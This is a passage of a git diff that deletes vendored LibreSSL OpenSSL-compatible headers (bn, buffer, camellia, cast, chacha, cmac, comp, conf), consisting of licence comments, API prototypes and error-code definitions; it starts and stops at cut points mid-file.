-int BN_nist_mod_256(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx);
-int BN_nist_mod_384(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx);
-int BN_nist_mod_521(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx);
-
-const BIGNUM *BN_get0_nist_prime_192(void);
-const BIGNUM *BN_get0_nist_prime_224(void);
-const BIGNUM *BN_get0_nist_prime_256(void);
-const BIGNUM *BN_get0_nist_prime_384(void);
-const BIGNUM *BN_get0_nist_prime_521(void);
-
-/* Primes from RFC 2409 */
-BIGNUM *get_rfc2409_prime_768(BIGNUM *bn);
-BIGNUM *get_rfc2409_prime_1024(BIGNUM *bn);
-
-/* Primes from RFC 3526 */
-BIGNUM *get_rfc3526_prime_1536(BIGNUM *bn);
-BIGNUM *get_rfc3526_prime_2048(BIGNUM *bn);
-BIGNUM *get_rfc3526_prime_3072(BIGNUM *bn);
-BIGNUM *get_rfc3526_prime_4096(BIGNUM *bn);
-BIGNUM *get_rfc3526_prime_6144(BIGNUM *bn);
-BIGNUM *get_rfc3526_prime_8192(BIGNUM *bn);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_BN_strings(void);
-
-/* Error codes for the BN functions. */
-
-/* Function codes. */
-#define BN_F_BNRAND					 127
-#define BN_F_BN_BLINDING_CONVERT_EX			 100
-#define BN_F_BN_BLINDING_CREATE_PARAM			 128
-#define BN_F_BN_BLINDING_INVERT_EX			 101
-#define BN_F_BN_BLINDING_NEW				 102
-#define BN_F_BN_BLINDING_UPDATE				 103
-#define BN_F_BN_BN2DEC					 104
-#define BN_F_BN_BN2HEX					 105
-#define BN_F_BN_CTX_GET					 116
-#define BN_F_BN_CTX_NEW					 106
-#define BN_F_BN_CTX_START				 129
-#define BN_F_BN_DIV					 107
-#define BN_F_BN_DIV_NO_BRANCH				 138
-#define BN_F_BN_DIV_RECP				 130
-#define BN_F_BN_EXP					 123
-#define BN_F_BN_EXPAND2					 108
-#define BN_F_BN_GENERATE_PRIME_EX			 140
-#define BN_F_BN_EXPAND_INTERNAL				 120
-#define BN_F_BN_GF2M_MOD				 131
-#define BN_F_BN_GF2M_MOD_EXP				 132
-#define BN_F_BN_GF2M_MOD_MUL				 133
-#define BN_F_BN_GF2M_MOD_SOLVE_QUAD			 134
-#define BN_F_BN_GF2M_MOD_SOLVE_QUAD_ARR			 135
-#define BN_F_BN_GF2M_MOD_SQR				 136
-#define BN_F_BN_GF2M_MOD_SQRT				 137
-#define BN_F_BN_MOD_EXP2_MONT				 118
-#define BN_F_BN_MOD_EXP_MONT				 109
-#define BN_F_BN_MOD_EXP_MONT_CONSTTIME			 124
-#define BN_F_BN_MOD_EXP_MONT_WORD			 117
-#define BN_F_BN_MOD_EXP_RECP				 125
-#define BN_F_BN_MOD_EXP_SIMPLE				 126
-#define BN_F_BN_MOD_INVERSE				 110
-#define BN_F_BN_MOD_INVERSE_NO_BRANCH			 139
-#define BN_F_BN_MOD_LSHIFT_QUICK			 119
-#define BN_F_BN_MOD_MUL_RECIPROCAL			 111
-#define BN_F_BN_MOD_SQRT				 121
-#define BN_F_BN_MPI2BN					 112
-#define BN_F_BN_NEW					 113
-#define BN_F_BN_RAND					 114
-#define BN_F_BN_RAND_RANGE				 122
-#define BN_F_BN_USUB					 115
-
-/* Reason codes. */
-#define BN_R_ARG2_LT_ARG3				 100
-#define BN_R_BAD_RECIPROCAL				 101
-#define BN_R_BIGNUM_TOO_LONG				 114
-#define BN_R_BITS_TOO_SMALL				 117
-#define BN_R_CALLED_WITH_EVEN_MODULUS			 102
-#define BN_R_DIV_BY_ZERO				 103
-#define BN_R_ENCODING_ERROR				 104
-#define BN_R_EXPAND_ON_STATIC_BIGNUM_DATA		 105
-#define BN_R_INPUT_NOT_REDUCED				 110
-#define BN_R_INVALID_LENGTH				 106
-#define BN_R_INVALID_RANGE				 115
-#define BN_R_NOT_A_SQUARE				 111
-#define BN_R_NOT_INITIALIZED				 107
-#define BN_R_NO_INVERSE					 108
-#define BN_R_NO_SOLUTION				 116
-#define BN_R_P_IS_NOT_PRIME				 112
-#define BN_R_TOO_MANY_ITERATIONS			 113
-#define BN_R_TOO_MANY_TEMPORARY_VARIABLES		 109
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/buffer.h b/thirdparty/libressl/include/openssl/buffer.h
deleted file mode 100644
index ed6dac0..0000000
--- a/thirdparty/libressl/include/openssl/buffer.h
+++ /dev/null
@@ -1,122 +0,0 @@
-/* $OpenBSD: buffer.h,v 1.15 2015/06/24 10:05:14 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_BUFFER_H
-#define HEADER_BUFFER_H
-#if !defined(HAVE_ATTRIBUTE__BOUNDED__) && !defined(__OpenBSD__)
-#define __bounded__(x, y, z)
-#endif
-
-#include <openssl/ossl_typ.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#include <stddef.h>
-#include <sys/types.h>
-
-/* Already declared in ossl_typ.h */
-/* typedef struct buf_mem_st BUF_MEM; */
-
-struct buf_mem_st {
-	size_t length;	/* current number of bytes */
-	char *data;
-	size_t max;	/* size of buffer */
-};
-
-BUF_MEM *BUF_MEM_new(void);
-void	BUF_MEM_free(BUF_MEM *a);
-int	BUF_MEM_grow(BUF_MEM *str, size_t len);
-int	BUF_MEM_grow_clean(BUF_MEM *str, size_t len);
-
-#ifndef LIBRESSL_INTERNAL
-char *	BUF_strdup(const char *str);
-char *	BUF_strndup(const char *str, size_t siz);
-void *	BUF_memdup(const void *data, size_t siz);
-void	BUF_reverse(unsigned char *out, const unsigned char *in, size_t siz);
-
-/* safe string functions */
-size_t BUF_strlcpy(char *dst, const char *src, size_t siz)
-	__attribute__ ((__bounded__(__string__,1,3)));
-size_t BUF_strlcat(char *dst, const char *src, size_t siz)
-	__attribute__ ((__bounded__(__string__,1,3)));
-#endif
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_BUF_strings(void);
-
-/* Error codes for the BUF functions. */
-
-/* Function codes. */
-#define BUF_F_BUF_MEMDUP				 103
-#define BUF_F_BUF_MEM_GROW				 100
-#define BUF_F_BUF_MEM_GROW_CLEAN			 105
-#define BUF_F_BUF_MEM_NEW				 101
-#define BUF_F_BUF_STRDUP				 102
-#define BUF_F_BUF_STRNDUP				 104
-
-/* Reason codes. */
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/camellia.h b/thirdparty/libressl/include/openssl/camellia.h
deleted file mode 100644
index b9b5f79..0000000
--- a/thirdparty/libressl/include/openssl/camellia.h
+++ /dev/null
@@ -1,125 +0,0 @@
-/* $OpenBSD: camellia.h,v 1.5 2014/11/13 20:01:58 miod Exp $ */
-/* ====================================================================
- * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer. 
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- */
-
-#ifndef HEADER_CAMELLIA_H
-#define HEADER_CAMELLIA_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_CAMELLIA
-#error CAMELLIA is disabled.
-#endif
-
-#include <stddef.h>
-
-#define CAMELLIA_ENCRYPT	1
-#define CAMELLIA_DECRYPT	0
-
-/* Because array size can't be a const in C, the following two are macros.
-   Both sizes are in bytes. */
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* This should be a hidden type, but EVP requires that the size be known */
-
-#define CAMELLIA_BLOCK_SIZE 16
-#define CAMELLIA_TABLE_BYTE_LEN 272
-#define CAMELLIA_TABLE_WORD_LEN (CAMELLIA_TABLE_BYTE_LEN / 4)
-
-typedef unsigned int KEY_TABLE_TYPE[CAMELLIA_TABLE_WORD_LEN]; /* to match with WORD */
-
-struct camellia_key_st {
-	union {
-		double d;	/* ensures 64-bit align */
-		KEY_TABLE_TYPE rd_key;
-	} u;
-	int grand_rounds;
-};
-typedef struct camellia_key_st CAMELLIA_KEY;
-
-int Camellia_set_key(const unsigned char *userKey, const int bits,
-	CAMELLIA_KEY *key);
-
-void Camellia_encrypt(const unsigned char *in, unsigned char *out,
-	const CAMELLIA_KEY *key);
-void Camellia_decrypt(const unsigned char *in, unsigned char *out,
-	const CAMELLIA_KEY *key);
-
-void Camellia_ecb_encrypt(const unsigned char *in, unsigned char *out,
-	const CAMELLIA_KEY *key, const int enc);
-void Camellia_cbc_encrypt(const unsigned char *in, unsigned char *out,
-	size_t length, const CAMELLIA_KEY *key,
-	unsigned char *ivec, const int enc);
-void Camellia_cfb128_encrypt(const unsigned char *in, unsigned char *out,
-	size_t length, const CAMELLIA_KEY *key,
-	unsigned char *ivec, int *num, const int enc);
-void Camellia_cfb1_encrypt(const unsigned char *in, unsigned char *out,
-	size_t length, const CAMELLIA_KEY *key,
-	unsigned char *ivec, int *num, const int enc);
-void Camellia_cfb8_encrypt(const unsigned char *in, unsigned char *out,
-	size_t length, const CAMELLIA_KEY *key,
-	unsigned char *ivec, int *num, const int enc);
-void Camellia_ofb128_encrypt(const unsigned char *in, unsigned char *out,
-	size_t length, const CAMELLIA_KEY *key,
-	unsigned char *ivec, int *num);
-void Camellia_ctr128_encrypt(const unsigned char *in, unsigned char *out,
-	size_t length, const CAMELLIA_KEY *key,
-	unsigned char ivec[CAMELLIA_BLOCK_SIZE],
-	unsigned char ecount_buf[CAMELLIA_BLOCK_SIZE],
-	unsigned int *num);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif /* !HEADER_Camellia_H */
diff --git a/thirdparty/libressl/include/openssl/cast.h b/thirdparty/libressl/include/openssl/cast.h
deleted file mode 100644
index 1043c7f..0000000
--- a/thirdparty/libressl/include/openssl/cast.h
+++ /dev/null
@@ -1,104 +0,0 @@
-/* $OpenBSD: cast.h,v 1.12 2014/07/10 22:45:56 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_CAST_H
-#define HEADER_CAST_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#ifdef OPENSSL_NO_CAST
-#error CAST is disabled.
-#endif
-
-#define CAST_ENCRYPT	1
-#define CAST_DECRYPT	0
-
-#define CAST_LONG unsigned int
-
-#define CAST_BLOCK	8
-#define CAST_KEY_LENGTH	16
-
-typedef struct cast_key_st
-	{
-	CAST_LONG data[32];
-	int short_key;	/* Use reduced rounds for short key */
-	} CAST_KEY;
-
-void CAST_set_key(CAST_KEY *key, int len, const unsigned char *data);
-void CAST_ecb_encrypt(const unsigned char *in, unsigned char *out, const CAST_KEY *key,
-		      int enc);
-void CAST_encrypt(CAST_LONG *data, const CAST_KEY *key);
-void CAST_decrypt(CAST_LONG *data, const CAST_KEY *key);
-void CAST_cbc_encrypt(const unsigned char *in, unsigned char *out, long length,
-		      const CAST_KEY *ks, unsigned char *iv, int enc);
-void CAST_cfb64_encrypt(const unsigned char *in, unsigned char *out,
-			long length, const CAST_KEY *schedule, unsigned char *ivec,
-			int *num, int enc);
-void CAST_ofb64_encrypt(const unsigned char *in, unsigned char *out, 
-			long length, const CAST_KEY *schedule, unsigned char *ivec,
-			int *num);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/chacha.h b/thirdparty/libressl/include/openssl/chacha.h
deleted file mode 100644
index 8d94e62..0000000
--- a/thirdparty/libressl/include/openssl/chacha.h
+++ /dev/null
@@ -1,54 +0,0 @@
-/* $OpenBSD: chacha.h,v 1.7 2015/12/09 14:07:55 bcook Exp $ */
-/*
- * Copyright (c) 2014 Joel Sing <jsing@openbsd.org>
- *
- * Permission to use, copy, modify, and distribute this software for any
- * purpose with or without fee is hereby granted, provided that the above
- * copyright notice and this permission notice appear in all copies.
- *
- * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
- * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
- * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
- * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
- * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
- * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
- * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
- */
-
-#ifndef HEADER_CHACHA_H
-#define HEADER_CHACHA_H
-
-#include <openssl/opensslconf.h>
-
-#if defined(OPENSSL_NO_CHACHA)
-#error ChaCha is disabled.
-#endif
-
-#include <stddef.h>
-#include <stdint.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct {
-	unsigned int input[16];
-	unsigned char ks[64];
-	unsigned char unused;
-} ChaCha_ctx;
-
-void ChaCha_set_key(ChaCha_ctx *ctx, const unsigned char *key,
-    unsigned int keybits);
-void ChaCha_set_iv(ChaCha_ctx *ctx, const unsigned char *iv,
-    const unsigned char *counter);
-void ChaCha(ChaCha_ctx *ctx, unsigned char *out, const unsigned char *in,
-    size_t len);
-
-void CRYPTO_chacha_20(unsigned char *out, const unsigned char *in, size_t len,
-    const unsigned char key[32], const unsigned char iv[8], uint64_t counter);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif /* HEADER_CHACHA_H */
diff --git a/thirdparty/libressl/include/openssl/cmac.h b/thirdparty/libressl/include/openssl/cmac.h
deleted file mode 100644
index cb6d64b..0000000
--- a/thirdparty/libressl/include/openssl/cmac.h
+++ /dev/null
@@ -1,82 +0,0 @@
-/* $OpenBSD: cmac.h,v 1.3 2014/06/21 13:42:14 jsing Exp $ */
-/* Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
- * project.
- */
-/* ====================================================================
- * Copyright (c) 2010 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    licensing@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- */
-
-
-#ifndef HEADER_CMAC_H
-#define HEADER_CMAC_H
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-#include <openssl/evp.h>
-
-/* Opaque */
-typedef struct CMAC_CTX_st CMAC_CTX;
-
-CMAC_CTX *CMAC_CTX_new(void);
-void CMAC_CTX_cleanup(CMAC_CTX *ctx);
-void CMAC_CTX_free(CMAC_CTX *ctx);
-EVP_CIPHER_CTX *CMAC_CTX_get0_cipher_ctx(CMAC_CTX *ctx);
-int CMAC_CTX_copy(CMAC_CTX *out, const CMAC_CTX *in);
-
-int CMAC_Init(CMAC_CTX *ctx, const void *key, size_t keylen,
-    const EVP_CIPHER *cipher, ENGINE *impl);
-int CMAC_Update(CMAC_CTX *ctx, const void *data, size_t dlen);
-int CMAC_Final(CMAC_CTX *ctx, unsigned char *out, size_t *poutlen);
-int CMAC_resume(CMAC_CTX *ctx);
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/comp.h b/thirdparty/libressl/include/openssl/comp.h
deleted file mode 100644
index fe7397f..0000000
--- a/thirdparty/libressl/include/openssl/comp.h
+++ /dev/null
@@ -1,73 +0,0 @@
-/* $OpenBSD: comp.h,v 1.8 2014/11/03 16:58:28 tedu Exp $ */
-
-#ifndef HEADER_COMP_H
-#define HEADER_COMP_H
-
-#include <openssl/crypto.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct comp_ctx_st COMP_CTX;
-
-typedef struct comp_method_st {
-	int type;		/* NID for compression library */
-	const char *name;	/* A text string to identify the library */
-	int (*init)(COMP_CTX *ctx);
-	void (*finish)(COMP_CTX *ctx);
-	int (*compress)(COMP_CTX *ctx, unsigned char *out, unsigned int olen,
-	    unsigned char *in, unsigned int ilen);
-	int (*expand)(COMP_CTX *ctx, unsigned char *out, unsigned int olen,
-	    unsigned char *in, unsigned int ilen);
-	/* The following two do NOTHING, but are kept for backward compatibility */
-	long (*ctrl)(void);
-	long (*callback_ctrl)(void);
-} COMP_METHOD;
-
-struct comp_ctx_st {
-	COMP_METHOD *meth;
-	unsigned long compress_in;
-	unsigned long compress_out;
-	unsigned long expand_in;
-	unsigned long expand_out;
-
-	CRYPTO_EX_DATA	ex_data;
-};
-
-
-COMP_CTX *COMP_CTX_new(COMP_METHOD *meth);
-void COMP_CTX_free(COMP_CTX *ctx);
-int COMP_compress_block(COMP_CTX *ctx, unsigned char *out, int olen,
-    unsigned char *in, int ilen);
-int COMP_expand_block(COMP_CTX *ctx, unsigned char *out, int olen,
-    unsigned char *in, int ilen);
-COMP_METHOD *COMP_rle(void );
-COMP_METHOD *COMP_zlib(void );
-void COMP_zlib_cleanup(void);
-
-#ifdef HEADER_BIO_H
-#ifdef ZLIB
-BIO_METHOD *BIO_f_zlib(void);
-#endif
-#endif
-
-void ERR_load_COMP_strings(void);
-
-/* Error codes for the COMP functions. */
-
-/* Function codes. */
-#define COMP_F_BIO_ZLIB_FLUSH				 99
-#define COMP_F_BIO_ZLIB_NEW				 100
-#define COMP_F_BIO_ZLIB_READ				 101
-#define COMP_F_BIO_ZLIB_WRITE				 102
-
-/* Reason codes. */
-#define COMP_R_ZLIB_DEFLATE_ERROR			 99
-#define COMP_R_ZLIB_INFLATE_ERROR			 100
-#define COMP_R_ZLIB_NOT_SUPPORTED			 101
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/conf.h b/thirdparty/libressl/include/openssl/conf.h
deleted file mode 100644
index 095066d..0000000
--- a/thirdparty/libressl/include/openssl/conf.h
+++ /dev/null
@@ -1,249 +0,0 @@
-/* $OpenBSD: conf.h,v 1.14 2015/02/07 13:19:15 doug Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
